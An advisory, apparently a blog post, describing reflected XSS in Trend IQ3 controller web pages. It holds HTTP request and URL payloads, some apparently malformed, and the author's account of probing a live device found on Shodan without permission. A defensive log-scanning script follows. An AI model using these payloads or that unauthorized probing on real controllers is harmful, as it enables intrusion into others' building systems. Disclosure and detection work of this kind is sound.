IQ3 Trend LAN Controller – Multiple Reflected XSS

Trend Control Systems makes a series of products called IQ3 controllers running IQ3 Excite software (Manual). From a Shodan search I found one and poked at it without authentication. By default you are given system guest access, which lets you see the status of components. Some of these pages allow cross-site scripting (CVE-2013-78004).

1. K.htm ovrideStart Parameter Reflected XSS

GET /K.htm?ovrideStart=dfdfdf&ovrideStart=dfdfdf"><alert>('DF')</script>&ovrideStart=0 HTTP/1.1
User-Agent: Opera/9.80 (Windows NT 6.1; WOW64) Presto/2.12.388 Version/12.16
Host: 1.2.3.4
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
Referer: http://1.2.3.4/K.htm?ovrideStart=df&ovrideStart=0
Proxy-Connection: Keep-Alive

[Screenshot: iq3-xss1]

2. Z.htm ovrideStart Parameter Reflected XSS

In addition there are 10 sub-pages in the format Z#(W).htm, one for each of the 10 zones. Each of these pages has a reflected XSS in the same parameter:

http://1.2.3.4/Z2(W).htm?ovrideTitle:d=Normal%20Week"><alert>('DF')</script>

3. P.htm ovrideStart Parameter Reflected XSS

4. S.htm ovrideStart Parameter Reflected XSS
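Covering all four pages above, here is an added example (not from the original post) of a defender-side check: a small Python scanner that parses web-server access-log lines, URL-decodes the query string, and flags requests whose ovrideStart / ovrideTitle value on the affected pages carries markup. The Combined Log Format, the sample lines and the assumption that the Z#(W).htm pages reflect both parameters are mine, not the advisory's.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Page -> query parameters the advisory reports as reflected unencoded.
# Z#(W).htm covers the ten zone sub-pages Z1(W).htm .. Z10(W).htm; listing
# both parameters for them is an assumption, the post only shows ovrideTitle.
AFFECTED = {
    re.compile(r"^/K\.htm$", re.I): {"ovrideStart"},
    re.compile(r"^/P\.htm$", re.I): {"ovrideStart"},
    re.compile(r"^/S\.htm$", re.I): {"ovrideStart"},
    re.compile(r"^/Z(?:[1-9]|10)\(W\)\.htm$", re.I): {"ovrideStart", "ovrideTitle"},
}
# Characters that break out of a reflected attribute or element.
MARKUP = re.compile(r"[<>\"']|javascript:", re.I)
# Combined Log Format (assumed): ip ident user [ts] "METHOD url HTTP/x" ...
LOG_LINE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*"')

def check_request(url):
    """Return (path, parameter) pairs whose decoded value carries markup."""
    parts = urlsplit(url)
    hits = []
    for page_re, params in AFFECTED.items():
        if not page_re.match(parts.path):
            continue
        # parse_qs percent-decodes values; keep blanks so duplicates are all seen.
        for name, values in parse_qs(parts.query, keep_blank_values=True).items():
            base = name.split(":")[0]            # ovrideTitle:d -> ovrideTitle
            if base in params and any(MARKUP.search(v) for v in values):
                hits.append((parts.path, name))
    return hits

def scan_log(lines):
    """Return (client_ip, path, parameter) for every flagged request."""
    findings = []
    for line in lines:
        m = LOG_LINE.match(line)
        if m:
            for path, param in check_request(m["url"]):
                findings.append((m["ip"], path, param))
    return findings

# Constructed sample log lines: one benign K.htm request, two attempts, one miss.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2014:10:00:00 +0000] "GET /K.htm?ovrideStart=df&ovrideStart=0 HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2014:10:00:01 +0000] "GET /K.htm?ovrideStart=df%22%3E%3Cb%3Ex%3C/b%3E&ovrideStart=0 HTTP/1.1" 200 600',
    '10.0.0.9 - - [01/Jan/2014:10:00:02 +0000] "GET /Z2(W).htm?ovrideTitle:d=Normal%20Week%22%3E%3Cb%3Ex%3C/b%3E HTTP/1.1" 200 700',
    '10.0.0.7 - - [01/Jan/2014:10:00:03 +0000] "GET /index.htm?ovrideStart=%3Cb%3E HTTP/1.1" 200 300',
]

if __name__ == "__main__":
    for ip, path, param in scan_log(SAMPLE_LOG):
        print(f"{ip} reflected-XSS attempt on {path} via {param}")
```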
